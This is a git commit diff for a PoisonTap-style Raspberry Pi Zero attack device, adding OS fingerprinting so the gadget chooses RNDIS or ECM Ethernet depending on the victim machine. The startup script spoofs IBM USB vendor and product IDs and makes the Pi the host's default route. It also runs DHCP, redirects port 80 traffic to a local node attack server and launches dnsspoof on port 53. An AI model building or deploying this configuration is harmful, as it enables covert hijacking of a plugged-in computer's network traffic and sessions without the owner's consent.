Adds basic OS fingerprinting

modules

@@ -4,5 +4,7 @@
 # at boot time, one per line. Lines beginning with "#" are ignored.
 
 dwc2
-libcomposite
+#libcomposite
+g_ether
+usbmon
 #g_ether

pi_startup.sh

@@ -1,31 +1,41 @@
 #!/bin/sh
 #
-# HackPi
+# PoisonTap
-#  by wismna
+#  by samy kamkar
-#  https://github.com/wismna/raspberry-pi/blob/master/HackPi
+#  http://samy.pl/poisontap
-#  04/01/2017
+#  01/08/2016
+#
+# If you find this doesn't come up automatically as an ethernet device
+# change idVendor/idProduct to 0x04b3/0x4010
 
 cd /sys/kernel/config/usb_gadget/
-mkdir -p hackpi
+mkdir -p poisontap
-cd hackpi
+cd poisontap
 
-# Unique MAC Addresses per configuration
+OS=`cat /home/pi/os.txt`
-# first byte of address must be even
 HOST="48:6f:73:74:50:43"
 SELF0="42:61:64:55:53:42"
 SELF1="42:61:64:55:53:43"
 
-echo 0x04b3 > idVendor  # IBM Cor^poration
+#echo 0x0B95 > idVendor # ASIX
-echo 0x4010 > idProduct # IBM USB Remote NDIS Network Device
+#echo 0x772B > idProduct # 8772B
+#echo 0x0002 > bcdDevice # Revision 2 > 8772C
+#echo 0x0bda > idVendor
+#echo 0x8152 > idProduct
+#echo 0x2001 > bcdDevice
+echo 0x04b3 > idVendor  # IN CASE BELOW DOESN'T WORK
+echo 0x4010 > idProduct # IN CASE BELOW DOESN'T WORK
+#echo 0x1d6b > idVendor   # Linux Foundation
+#echo 0x0104 > idProduct  # Multifunction Composite Gadget
+
 echo 0x0100 > bcdDevice # v1.0.0
 mkdir -p strings/0x409
 echo "badc0deddeadbeef" > strings/0x409/serialnumber
 echo "wismna" > strings/0x409/manufacturer
-echo "HackPi" > strings/0x409/product
+echo "PiZero" > strings/0x409/product
 
-# Config 1: RNDIS (Ethernet)
+if [ "$OS" != "MacOs" ]; then
-# This needs to be first so Windows can load the RNDIS driver. Mac (formerly)
+	# Config 1: RNDIS
-# and Linux will ignore it and load the second configuration
 	mkdir -p configs/c.1/strings/0x409
 	echo "0x80" > configs/c.1/bmAttributes
 	echo 250 > configs/c.1/MaxPower
@@ -40,41 +50,41 @@ echo $SELF0 > functions/rndis.usb0/dev_addr
 	echo $HOST > functions/rndis.usb0/host_addr
 	echo "RNDIS" > functions/rndis.usb0/os_desc/interface.rndis/compatible_id
 	echo "5162001" > functions/rndis.usb0/os_desc/interface.rndis/sub_compatible_id
+fi
 
-# Config 2: CDC ECM (Ethernet)
+# Config 2: CDC ECM
 mkdir -p configs/c.2/strings/0x409
 echo "Config 2: ECM network" > configs/c.2/strings/0x409/configuration
 echo 250 > configs/c.2/MaxPower
 
 mkdir -p functions/ecm.usb0
+# first byte of address must be even
 echo $HOST > functions/ecm.usb0/host_addr
 echo $SELF1 > functions/ecm.usb0/dev_addr
 
-# Create the CDC ACM (serial) function
+# Create the CDC ACM function
 mkdir -p functions/acm.gs0
 
 # Link everything and bind the USB device
-# Fist config, RNDIS function
+if [ "$OS" != "MacOs" ]; then
-# Comment these two lines to make it work on MacOs
 	ln -s configs/c.1 os_desc
 	ln -s functions/rndis.usb0 configs/c.1
+fi
 
-# Second config, CDC ECM and ACM functions
 ln -s functions/ecm.usb0 configs/c.2
 ln -s functions/acm.gs0 configs/c.2
 # End functions
 ls /sys/class/udc > UDC
 
-# Load the brige interface now
 ifup br0
 ifconfig br0 up
 
 /sbin/route add -net 0.0.0.0/0 br0
 /etc/init.d/isc-dhcp-server start
 
+#/sbin/sysctl -w net.ipv4.ip_forward=1
 /sbin/iptables -t nat -A PREROUTING -i br0 -p tcp --dport 80 -j REDIRECT --to-port 1337
 /usr/bin/screen -dmS dnsspoof /usr/sbin/dnsspoof -i br0 port 53
 /usr/bin/screen -dmS node /usr/bin/nodejs /home/pi/poisontap/pi_poisontap.js 
 
-# Enable console login
 systemctl enable getty@ttyGS0.service

rc.local

@@ -17,6 +17,13 @@ if [ "$_IP" ]; then
   printf "My IP address is %s\n" "$_IP"
 fi
 
+# Parse USB requests in dmesg
+/bin/bash /home/pi/umap/usbreq.sh | tee /home/pi/os.txt
+
+# Stop the dummy gadget and start the real one
+modprobe -r g_ether
+modprobe libcomposite
+
 # libcomposite configuration
 /bin/sh /home/pi/poisontap/pi_startup.sh | tee /home/pi/poisontap/pi_startup.log